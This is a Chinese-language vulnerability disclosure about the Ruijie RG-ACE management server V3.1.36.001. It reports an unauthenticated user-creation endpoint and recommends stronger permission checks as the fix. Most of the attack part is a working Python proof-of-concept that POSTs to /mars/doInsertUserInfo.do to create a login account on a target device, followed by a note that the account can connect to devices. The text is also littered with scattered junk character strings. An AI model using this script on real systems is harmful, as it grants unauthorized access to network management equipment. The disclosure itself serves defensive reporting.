锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
- ?7 @  h$ l! h0 L+ R4 N& Y0 k

8 N6 ]$ ]8 Z3 D+ d0 F3 Y! \, I/ m测试的具体版本是
9 g/ \# U0 Z) t- {3 s3 W产品名称: 锐捷应用控制引擎
7 ?) D# F' Y  _9 X版本号: 3.1.36.001 TC
1 t; X/ `2 g0 B+ [3 X+ }编译时间: 201104291730


! |4 `- N: N& D: M6 K8 D漏洞证明：


2 w& p* w# B7 r& P, K6 \
, R, s8 g% A6 a7 V' L
* e! E: ]- |* c- Q3 [
7 O2 [1 j, A) @! [1 x. i" l; J9 j
, k+ Y9 U& I1 V执行脚本
, J9 S9 t% ^) \9 O  f7 e#! /usr/bin/env python
#coding=gbk
: q' n$ G3 f. I3 ]+ z#RG-ACE管理服务器 V3.1.36.001
; _( h  P! F7 K2 ^import urllib2, urllib,cookielib
5 W! @7 V  F7 G- Qurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
+ b, V& c4 p, T- ?9 e" L% g# A  ^opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
+ C: p! Y  F2 h7 Z3 j* ]+ f("useractionname","addButtonValue"),
* J; ?; `( Z  x# M# u4 j6 i4 o% x("useropermanager","userManager"),
7 h) |; t: `; A0 }("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
) ]1 }4 |7 x, B("officePhone",""),
("addr",""),
( |( I' r' [' d  T("submit","确定"))
urllib2.install_opener(opener)
3 N0 Y" ~* n/ w+ t: v  ~p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

登录，连接设备


# h, H. J- g/ {, x  B9 \/ x9 Y
/ y1 G5 L! x2 p) V6 W+ q) _# G3 l1 K
( X, [& ]% e# N" g" q4 ?
默认的管理员admin权限更大点
$ G  T7 I$ w9 a1 o# H% Z4 I6 [
/ Q! S  q# F$ ?, n* i1 R4 P



修复方案：
' y. x3 i9 Q! a. F加强对接口的权限验证
# ]9 z* j5 G: w, p' g& O